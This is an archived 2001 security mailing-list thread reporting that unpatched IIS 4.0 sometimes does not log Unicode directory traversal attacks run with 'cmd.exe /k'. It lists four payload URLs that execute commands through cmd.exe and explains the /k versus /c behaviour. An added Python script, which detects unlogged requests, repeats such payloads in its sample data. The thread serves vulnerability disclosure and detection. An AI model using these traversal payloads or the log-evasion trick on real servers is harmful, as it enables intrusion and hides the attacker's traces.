RE: sometimes IIS 4.0 don't write logs.

From: Pablo Aravena (p.aravenaat_private)
Date: Thu Dec 20 2001 - 05:48:45 PST


    The problem looks like this:
    
    	CMD /K [command]  Executes a command and stays active.
    	CMD /C [command]  Executes a command and then finishes.
    
    	If you execute a cmd.exe?/k request, it stays in an active state
    	until the process is finished, unlike a cmd.exe?/c request, which
    	finishes the process immediately. Because of this, IIS does not
    	log the process that has not come to an end.
    		
    
    Sincerely,
    Pablo Aravena Martínez
    Security Consultant
    BYSECURE CSE S.A.
    PGP FingerPrint: 4109 41C1 A295 75D8 F159  D542 96C5 5E6D 2B08 F28A
    http://www.bysecure.com
    mailto:p.aravenaat_private
    
    
    > -----Original Message-----
    > From:	ThEye [SMTP:theyeat_private]
    > Sent:	Thursday, December 20, 2001 0:39
    > To:	vuln-devat_private
    > CC:	ndr113at_private
    > Subject:	sometimes IIS 4.0 don't write logs.
    > 
    > Hi:
    > 
    > I don't know if this problem is documented, but I didn't find anything
    > about it anywhere.
    > 
    > The problem is the following one:
    > 
    > + Problem:
    > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
    > Traversal Vulnerability" ( BugtraqID = 1806 ) I found that if the attacker
    > uses the "k" option of cmd ( cmd /k ) instead of the "c" option ( cmd /c ),
    > IIS 4.0 (with Extended Unicode Directory Traversal Vulnerability)
    > sometimes doesn't write logs of the attacker's activity.
    > 
    > + Implications:
    > If an attacker uses this vulnerability to crack a web page or anything, 
    > eventually no tracks will exist on the attacked server.
    > 
    > + Final:
    > In PROBLEM I said "sometimes" because after a high number of requests to
    > "cmd /k", IIS 4.0 writes logs of some requests; I still don't know when and
    > why IIS 4.0 writes logs of the "cmd /k" request.
    > Anyone who can confirm or refute this, please post it.
    > 
    > 
    > + Exploit:
    > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
    > ( without any patch ).
    > 
    > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
    > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
    > 
    > Result: No tracks on log files.
    > 
    > + More Information:
    > 1) Microsoft IIS and PWS Extended Unicode Directory Traversal
    > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
    > 2) Microsoft Patch prmcan4i
    > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
    > 
    > Roberto Alamos M. (theyeat_private)
    > www.350cc.com
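
The logging gap discussed in this thread means the IIS log alone cannot be trusted as a complete record. The following is an added example, not code from either poster: it compares a network-side request record against the IIS W3C log and reports requests that were seen on the wire but never logged. The sensor line format, the field selection and all sample lines are constructed assumptions.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample: hypothetical sensor (IDS/proxy) lines "time client method raw-url".
SENSOR = """\
10:15:02 192.0.2.10 GET /default.htm
10:15:07 192.0.2.44 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
10:15:09 192.0.2.44 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
10:15:30 192.0.2.10 GET /images/logo.gif
"""

# Constructed IIS W3C extended log covering the same period.
IIS_LOG = """\
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status
10:15:02 192.0.2.10 GET /default.htm - 200
10:15:07 192.0.2.44 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200
10:15:30 192.0.2.10 GET /images/logo.gif - 200
"""

def parse_iis(text):
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):        # column names for the rows below
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def key(client, method, path, query):
    # Compare on the final path segment: the server may log a decoded stem.
    return (client, method, path.rsplit("/", 1)[-1].lower(), query or "-")

def unlogged(sensor_text, iis_text, window=timedelta(seconds=5)):
    """Return sensor requests with no IIS log entry within the time window."""
    logged = {}
    for r in parse_iis(iis_text):
        k = key(r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["cs-uri-query"])
        logged.setdefault(k, []).append(datetime.strptime(r["time"], "%H:%M:%S"))
    missing = []
    for line in filter(str.strip, sensor_text.splitlines()):
        t, client, method, url = line.split()
        parts, seen = urlsplit(url), datetime.strptime(t, "%H:%M:%S")
        times = logged.get(key(client, method, parts.path, parts.query), [])
        match = next((x for x in times if abs(x - seen) <= window), None)
        if match is None:
            missing.append((t, client, url))   # seen on the wire, never logged
        else:
            times.remove(match)                # one log entry covers one request
    return missing
```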
    



    This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 09:06:09 PST